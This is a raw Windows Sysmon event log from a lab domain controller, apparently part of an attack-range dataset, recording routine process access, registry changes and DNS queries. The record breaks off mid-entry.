13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1101SetValue2021-01-18 13:34:39.126{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 22542200x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.610{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-4951460-C:\Windows\System32\svchost.exe 22542200x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.446{59A5CD1D-8E6F-6005-8100-00000000A301}4548win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.445{59A5CD1D-8E56-6005-2E00-00000000A301}246429.220.184.93.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.444{59A5CD1D-8E56-6005-2E00-00000000A301}24642.0.0.10.in-addr.arpa.0type: 12 ip-10-0-0-2.eu-central-1.compute.internal;C:\Windows\sysmon64.exe 22542200x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.444{59A5CD1D-8E56-6005-2E00-00000000A301}2464173.208.105.51.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.444{59A5CD1D-8E6F-6005-8100-00000000A301}4548localhost0::1;::ffff:127.0.0.1;C:\Windows\System32\taskhostw.exe 13241300x80000000000000002954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 10341000x80000000000000002942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.860{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 22542200x80000000000000002941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.634{59A5CD1D-8E44-6005-0B00-00000000A301}856DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.584{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495.attackrange.local010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.584{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\lsass.exe 22542200x80000000000000002938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.581{59A5CD1D-8E56-6005-2900-00000000A301}2768win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.532{59A5CD1D-8E56-6005-2E00-00000000A301}24641.f.e.f.f.f.5.f.c.d.e.2.6.f.c.0.c.2.8.7.1.5.8.2.0.0.0.0.1.0.0.2.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x80000000000000002936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:40.314{59A5CD1D-8E56-6005-2E00-00000000A301}2464e.f.1.8.f.f.f.f.a.f.2.9.2.8.f.0.6.0.0.2.f.7.3.8.e.0.1.0.0.0.a.0.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:40.282{59A5CD1D-8E56-6005-2E00-00000000A301}24641.f.e.f.f.f.5.f.c.d.e.2.6.f.c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:40.268{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 13241300x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 